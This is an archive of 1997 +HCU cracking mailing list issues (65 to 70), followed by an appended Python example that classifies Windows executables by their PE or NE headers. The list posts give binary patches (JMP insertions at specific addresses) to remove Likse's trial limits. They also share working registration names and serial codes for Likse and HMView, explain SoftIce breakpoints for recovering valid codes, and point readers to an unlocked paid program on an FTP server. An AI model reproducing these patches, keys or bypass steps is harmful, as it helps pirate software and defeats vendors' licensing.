We have to increment ESI by 2 otherwise the last two lines of the htm file are not purged of the html tags. (Maybe a bug? Who knows? We fix it anyway :)

The program writes at the beginning of every output text file that only the first 50 lines are converted. This should be left out when it writes the text to the file (tempfile.txt). One way to do this is to jump over all the routines which put the bad guy text into the output buffer. This can be achieved by inserting a JMP 45E730 instruction at position 45E6F0. The only inconvenience is that the name of the file we convert is inserted at the beginning of the output file.
Elimination of the max 5 displayed search result limit: The value 5 is at [464A90] and checked here: :004600A6 cmp bx, word ptr [00464A90] :004600AD jbe 004600B6 /make this to JMP :004600AF mov bx, word ptr [00464A90] There is also some text that only five results are displayed which is not true anymore :) So lets get rid of it by inserting a JMP 460080 to position 45FFC9 which just jumps all over the bad guy string construction rutins. With this modifications the program is fully functional. On the other hand if somebody knows a better offline browser (I think Rezident said he has one) please let me know. Thanks Zer0+ =====End of Issue 65==================================== ======================================================== +HCU Maillist Issue: 66 11/22/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: frmspy ARTICLES: -----#1------------------------------------------------- Subject: frmspy Hi All! I've used the FTP site +gthorne offered (thanks, +gthorne! :)) to upload my little tool frmspy. If he doesn't decide to move it around: *************************************************** The filename is frmspy.zip ~137kb. Notes:=20 The code is taken from a more complete utility for Delphi programmers that some friends are working on.=20 The complete tool is still under developement. When done, I'll post the address of the Delphi programming page where it's going to be published. I've limited the funcionality to just the interesting part (for us). Other limitations come from the fact that it's incomplete O:) -It's a 32 bits app.=20 -Only works with 32 bits exes (Delphi 2+ and BC++Builder). If you try to load a 16 bits program, it'll complain -"Not a PE file". -Some RCDATA resources might not be forms. 
In this case an "Incorrect format" message appears.
Tip: It can also manage DLLs. Be aware that, for Delphi3 programs, it's possible to find some DLLs with different file extensions (maybe DPL).
------------------
+ZERO, where did you download Likse?
greetings
+trurl
=====End of Issue 66====================================
=====Sorry, no #67 available!===========================
========================================================
+HCU Maillist Issue: 68 11/24/1997
--------------------------------------------------------
========================================================
CONTENTS:
#1 Subject: Re: frmspy and IRC war
#2 Subject: Attn AZ111
#3 Subject: An alternative to Likse
#4 Subject: Likse
#5 Subject: stupidest protection of all times
ARTICLES:
-----#1-------------------------------------------------
Subject: Re: frmspy and IRC war
>
> I've used the FTP site +gthorne offered (thanks, +gthorne! :)) to
> upload my little tool frmspy. If he doesn't decide to move it around:
>
> ***************************************************
>
> The filename is frmspy.zip ~137kb.
> ....
> +trurl
>
You are welcome :)
Notice also that the directories above contain the full install of tasm 5 (and of course the full ida that I just like having around) - and hopefully more in the future.
Feel free to make any subdirectories in the incoming directory; if they are intelligently named, I may just keep the same dir names and move them upward to the main .cracking tree.
I will be gone for a week (holiday and such) so I won't be able to look out for hundred meg overloaded uploads (eek!)
On a separate note, many of you have noticed that rIDDLER has banned me from #cracking (as well as resorting to irc attack programs to lock up my pc on occasion, and regularly knock me offline).
He is also on as Jami Quai.
It happened because one day he was bashing Fravia, me and +ORC (again - I hear it has happened on occasion before) and he asked me my opinion on tutorials. I told him they were an important part of the learning process... examples in texts have for thousands of years been an invaluable resource in schools. Where would we be without the written word? Dark ages I tell you.
Apparently he didn't like the fact that I wasn't going to easily lose my argument because it was different from his.
I feel it is a shame that someone I had once respected has to resort to childish bully tactics to enforce an opinion, rather than have healthy opinion differences like we all do from time to time.
I just thought I would let you know before it trickled down the grapevine. It is easier answering many questions pro-actively rather than re-explaining it each time someone finds out.
Take care all, I have a week of holiday planned where I can leave these minor irritations behind. See you when I get back.
+gthorne
/*****************************************************\
Greythorne The Technomancer
WebSite: *******************************
(AKA:) ************************************
(IP:) ****************************
Gateway: *************************************
Old Mirror: ******************************
FTP1: ******************************************
FTP2: *******************************************
\*****************************************************/
-----#2-------------------------------------------------
Subject: Attn AZ111
Regarding truetype fonts
------------------------
Documentation of the .ttf format can be obtained from ********************************************************
For all file format questions, I have found Wotsits File Format at ****************************** to be an excellent resource.
Regarding the CreateFont functions...
CreateFont defines a "logical font structure" on-the-fly, while CreateFontIndirect relies on a pre-made font structure (i.e., a resource). GetFontData obtains Font Data (presumably a "logical font structure", though one can never be sure with M$oft) from an existing .ttf font. The Enum functions obtain data about a font (per the .ttf file format, presumably a "logical font structure", again) and pass it to a function.
Further information can be obtained from the win32 API ref--if you do not have it, get a real compiler ;) or go to **************************************************************** and choose link #3.
Note that applications use a variety of ways to obtain fonts, including GetStockObject()--commonly used in everything but word processors (has courier, system, and Times New Roman avail).
_m
______________________________________________________
Get Your Private, Free Email at **********************
-----#3-------------------------------------------------
Subject: An alternative to Likse
Hello +Zer0,
> I worked on the Likse which I have downloaded from the
> ************* Likse download page.
> The link was called
> server2 and pointed to
> ******************************************************
The offline browser I found (the one I liked best) is called 'HMView 1.0' - I can't remember where I found it but if you search you'll probably find it easily enough. I made a serial number for it:
Name: User
Company: None
Code: NBPFQSLIQQWO
Cya,
+ReZiDeNt
-----#4-------------------------------------------------
Subject: Likse
About Likse: I've tried the previously submitted nfo on reg about this app, which was:
********************
NAME:CKL!1997
SN:2909679-2590 SINGLE LIC
SN:2909679-159 SITE LIC
SN:2909679-4694 ROYALTY FREE
SN:2909679-4210 LICENSE
The LICENSE worked fine, but if it won't work for you, it's a system dependent tool; anyway, after the valid reg (without any patch) the lkacess.ini:
[APPINFO]
REGNAME=CKL!1997
REGID=2909679-4210
[Advance]
All_Enabled=1
I've no time to look further where the possible check of machine license is, but the name:CKL!1997 / SN:2909679-4210 LICENSE worked fine on the given links of the previous issue.
-----#5-------------------------------------------------
Subject: stupidest protection of all times
now hear this.....
There is an excellent program called HEADLINER, which retrieves the headlines of ANY newspaper/magazine webpage you specify and shows it on your screen as a ticker of any size, even a small one in the title bar of the active windows. The free version is at ****************************************** - the only limitation is that you can only get the news from the webpages they set in memory. However, they left on that ftp the PRO version completely unlocked! (and some other proggies which I am d/loading right now to see what they are) - in the pro version, you can specify virtually ANY web page and get its 'headlines' (including Fravia's...)
So, if you want to grab your free version of headliner pro, just FTP to ***************************** - but there's a twitch: you can't get the list of the files in the directory by using a normal ftp client, only w/ Netscape or with a unix shell. Isn't that awfully stupid?
Anyway, the program is excellent - no ADS (like Pointcast and other newstickers), does not create a ticker reducing your desktop space, but uses the TITLE BAR of your open windows (there is a ticker and screensaver option, if you really want them).
So have fun.....
WAFNA of FCA
=====End of Issue 68====================================
========================================================
+HCU Maillist Issue: 69 11/25/1997
--------------------------------------------------------
========================================================
CONTENTS:
#1 Subject: IRC wars, sad lack of respect for the importance of tutorials :-
ARTICLES:
-----#1-------------------------------------------------
Subject: IRC wars, sad lack of respect for the importance of tutorials :-
Hi +gthorne,
> I feel it is a shame that someone I had once respected has to resort
> to childish bully tactics to enforce an opinion, rather than have
> healthy opinion differences like we all do from time to time.
I agree with you 100%!!!! Actually, I avoid IRC for this reason (I find it often degenerates into 'war') - but without cracking tutorials most of us would have no way of learning about this subject!
Keep up the good work!
+ReZiDeNt
=====End of Issue 69====================================
========================================================
+HCU Maillist Issue: 70 11/26/1997
--------------------------------------------------------
========================================================
CONTENTS:
#1 Subject: Re: Likse again
#2 Subject: Newer but still simple.
#3 Subject: (not quite cracking)
#4 Subject: New main site
#5 Subject: Newer but still simple
ARTICLES:
-----#1-------------------------------------------------
Subject: Re: Likse again
Hi!
>The LICENSE worked fine, but if it won't work for you, it's a system dependent
>tool; anyway, after the valid reg (without any patch) the
>lkacess.ini:
>[APPINFO]
>REGNAME=CKL!1997
>REGID=2909679-4210
>
>[Advance]
>All_Enabled=1
Yes, it does these things for me too, but the 50 line limit of text exporting and the limit of displaying only 5 hits in the search remain.
>I've no time to look further where the possible check of machine license
>is, but the name:CKL!1997 / SN:2909679-4210 LICENSE
>worked fine on the given links of the previous issue.
When did you download your program from that web site? Or if it's not a problem for you, you can send your version as an email attachment to ********************** and I can check it out. If you don't want to do that (having a slow modem etc.) then let's just drop the whole issue; this program is overcracked anyway :)
bye
Zer0+
-----#2-------------------------------------------------
Subject: Newer but still simple.
Hail +ReZideNt:
Checked for HMView. Found one at **************** by Bersoft called HMView v1.52, zipped size 537,900 bytes. Must be an update since it used the same 12 digit size regcode.
Name: User
Company: <-- Leave Company Info Blank
Code: OAPLLXTOPQWO
If you use Softice, BPX on Hmemcpy and F12 back to program code area xxxx:00455686, then if you D on xxxx:00D42800 you will see the user name, bogus number and the echo. One of those self cracking programs, but good in that it installs under 500K with very few files. It writes the registration to an ini file so you can erase and reinstall if you need the practice. Like the simplicity. Thanks.
wlc
-----#3-------------------------------------------------
Subject: (not quite cracking)
The next stage of the browser wars...
Manufacturers such as Compaq, Acer, and HP are going to be providing their "own" browsers with PCs; these browsers will be the default browser (though MSIE and/or Netscape may be bundled with the computer as well) and will deliver for your viewing pleasure a banner ad at the bottom of the browser that will change every thirty seconds (hmm, just like TV commercials). Supposedly the ad will be "always on top", and cannot be turned off by the user.
Micro$oft has no problem with this as the browsers will be based on Explorer and Active X (kind of like "Brand X") technology...essentially allowing M$oft to entrench its internet technology as a standard at the small price of brand recognition: in these new browsers the MS or IE logo will not be apparent.
I'm sure none of you buy pre-made computers such as Dells or (horror!) Compaq, but keep an eye out for the "evolution" of browsers towards becoming the foundation for the next-generation television--we may be cracking ads as well as protection schemes in a few years...
_m
PS full story at ********************************************************************** --source is Advertising Age, a newspaper I highly recommend for finding out what they plan to do to you before they do it...be sure to cut your doses heavily with material from ****************** or you may become one of them.... ;)
______________________________________________________
Get Your Private, Free Email at **********************
-----#4-------------------------------------------------
Subject: New main site
I had to move; the situation was getting unbearable: every broken link and every server breakdown was landing everybody on a smut search engine. Ironical fate for my very own main page :-)
You may want to update your links.
Old main page will be frozen from now on. Here is the snippet I have prepared for usenet; some of my visitors will surely publish it in the next days.
---------------------------------------------------
Fravia's page of reverse engineering has moved from
(now frozen)
to
New main page should work fine as soon as some feedback
shows me the broken links. You may help as well if you feel like it.
I tell you what I will do:
RETALIATE!
Read ideale.htm and especially general.htm and be prepared for some
fireworks!
I'll work on this stuff for the next couple of months.
There is a lot to learn.
There are many enemies to destroy, not only smutters.
A very crossed fravia+
-----#5-------------------------------------------------
Subject: Newer but still simple
Hail +ReZideNt:
Checked for HMView. Found one at **************** by Bersoft called
HMView v1.52, zipped size 537,900 bytes. Must be an update since it
used the same 12 digit size regcode. Seems to use a similar dll library
as Liske 32 and wipes out the data area after checking. Had to close
down the program and restart to enter info properly.
Name: User
Company: <-- Leave Company Info Blank
Code: OAPLLXTOPQWO
If you use Softice, BPX on Hmemcpy and F12 back to program code area
xxxx:00455686, then if you D on xxxx:00D42800 you will see the user
name, bogus number and the echo. One of those self cracking programs,
but good in that it installs with very few files. It writes the
registration to an ini file so you can erase and reinstall if you
need the practice. I like the simplicity. Will compare it with
Liske. Thanks.
wlc
=====End of Issue 70====================================
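The frmspy note in Issue 66 says the tool refuses 16-bit programs with "Not a PE file" and only handles 32-bit executables. The distinction it is making lives entirely in the file header: every Windows executable starts with a DOS "MZ" header, and the dword at offset 0x3C (e_lfanew) points to the "new" header, which is "PE\0\0" for 32-bit (and later) images and "NE" for 16-bit Windows programs; the pointer is only meaningful when the relocation table offset at 0x18 (e_lfarlc) is 0x40 or more, as plain DOS programs keep it lower. The following is an added editor's example in Python, not code from frmspy or from any poster; the function names and the header-only sample images it builds are assumptions constructed here for illustration.

```python
"""Header-level triage of Windows executables: PE (32-bit+) vs NE (16-bit) vs
plain MZ/DOS. Added example; not part of frmspy or the mailing list."""
import struct

PE_SIGNATURE = b"PE\x00\x00"   # "new" header signature for 32-bit and later images
NE_SIGNATURE = b"NE"           # "new executable" signature for 16-bit Windows programs


def detect_executable_format(data: bytes) -> dict:
    """Classify an executable image by its headers alone.

    Returns {'format': 'PE' | 'NE' | 'MZ' | 'unknown'} and, for PE images,
    the COFF 'machine' value and the section count.
    """
    info = {"format": "unknown"}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    # e_lfarlc (offset 0x18): relocation table offset. DOS-only programs keep it
    # below 0x40; only a value >= 0x40 means e_lfanew (offset 0x3C) is valid.
    (e_lfarlc,) = struct.unpack_from("<H", data, 0x18)
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    info["format"] = "MZ"
    if e_lfarlc < 0x40 or e_lfanew + 4 > len(data):
        return info            # no new header, or it points past the end of the file
    sig = data[e_lfanew:e_lfanew + 4]
    if sig == PE_SIGNATURE:
        info["format"] = "PE"
        # The COFF file header follows the signature: Machine (u16), NumberOfSections (u16)
        if e_lfanew + 8 <= len(data):
            machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
            info["machine"] = machine
            info["sections"] = nsections
    elif sig[:2] == NE_SIGNATURE:
        info["format"] = "NE"
    return info


def build_sample(kind: str) -> bytes:
    """Construct a minimal header-only image of the given kind (constructed test input)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    if kind == "MZ":
        struct.pack_into("<H", hdr, 0x18, 0x1C)   # relocation table inside the old header
        return bytes(hdr)
    struct.pack_into("<H", hdr, 0x18, 0x40)       # e_lfarlc >= 0x40: a new header follows
    struct.pack_into("<I", hdr, 0x3C, 0x40)       # e_lfanew: new header right after DOS header
    if kind == "PE":
        # IMAGE_FILE_MACHINE_I386 (0x14C) with three sections
        return bytes(hdr) + PE_SIGNATURE + struct.pack("<HH", 0x14C, 3)
    if kind == "NE":
        return bytes(hdr) + NE_SIGNATURE + b"\x00\x00"
    raise ValueError(kind)


if __name__ == "__main__":
    for kind in ("PE", "NE", "MZ"):
        print(kind, detect_executable_format(build_sample(kind)))
```

The e_lfarlc check is the part most quick-and-dirty tools skip: without it a DOS program whose bytes at 0x3C happen to point at the string "PE" gets mislabelled, and a truncated download whose e_lfanew runs past the end of the file raises an exception instead of being reported as a plain MZ image.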